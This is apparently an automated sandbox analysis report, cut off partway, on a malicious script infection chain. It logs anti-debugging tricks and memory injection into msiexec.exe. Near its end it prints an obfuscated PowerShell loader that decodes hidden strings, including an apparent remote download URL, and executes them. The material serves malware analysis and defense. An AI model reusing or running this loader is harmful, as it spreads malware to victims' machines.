Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5860 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3951 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6604 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3141 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6128 Thread sleep count: 5199 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1272 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 5199 delay: -5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 60000 Jump to behavior
Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWeP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0299DAAC LdrInitializeThunk,LdrInitializeThunk, 5_2_0299DAAC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_5972.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2EC0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 7EFDF4 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / 